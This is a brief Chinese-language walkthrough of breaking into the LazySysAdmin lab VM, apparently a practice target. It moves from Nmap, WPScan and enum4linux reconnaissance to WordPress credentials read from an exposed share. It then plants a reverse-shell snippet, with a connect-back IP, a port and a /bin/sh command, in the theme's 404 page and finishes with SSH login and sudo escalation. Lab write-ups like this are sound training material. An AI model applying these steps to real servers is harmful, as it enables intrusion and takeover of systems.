目录
信息收集
root@kali:~# nmap -A 192.168.243.159
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-27 20:40 EST
Nmap scan report for bogon (192.168.243.159)
Host is up (0.00063s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.243.133
|_ error: Closing link: ([email protected]) [Client exited]
MAC Address: 00:0C:29:5A:23:74 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2020-12-28T11:41:10+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-27 20:41:10
|_ start_date: N/ATRACEROUTE
HOP RTT ADDRESS
1 0.63 ms bogon (192.168.243.159)
访问80端口页面-backnode
view-source:http://192.168.243.159/#%21page-use-backnode
目录遍历
root@kali:~# dirb http://192.168.243.159/
wordpress
http://192.168.243.159/wordpress/
WPscan
root@kali:~# wpscan -u http://192.168.243.159/wordpress/ -eu --force
组件
enum4linux
root@kali:~# enum4linux 192.168.243.159
发现共享OK
nikto扫描
root@kali:~# nikto -h 192.168.243.159
phpmyadmin
http://192.168.243.159/phpmyadmin/
查看共享目录
找到wordpress密码 wp-config.php
define('DB_USER', 'Admin');
define('DB_PASSWORD', 'TogieMYSQL12345^^');
登录成功
文件上传修改
反弹木马
在管理页面的 Apperance -> Editor ,修改 404 页面的模板
添加内容:
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.128';
$port = '4444';
$CHUNK_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a;w;id;/bin/sh -i';
$darmon = 0;
$debug = 0;
kali 设置反弹,获取到初始的 shell环境
http://192.168.243.159/wordpress/wp-content/themes/twentyfifteen/404.php
(二) phpmyadmin
togie 12345
SSH登录
sudo提权
参考链接
https://blog.csdn.net/kevinhanser/article/details/82026466
https://blog.csdn.net/Kevinhanser/article/details/82026466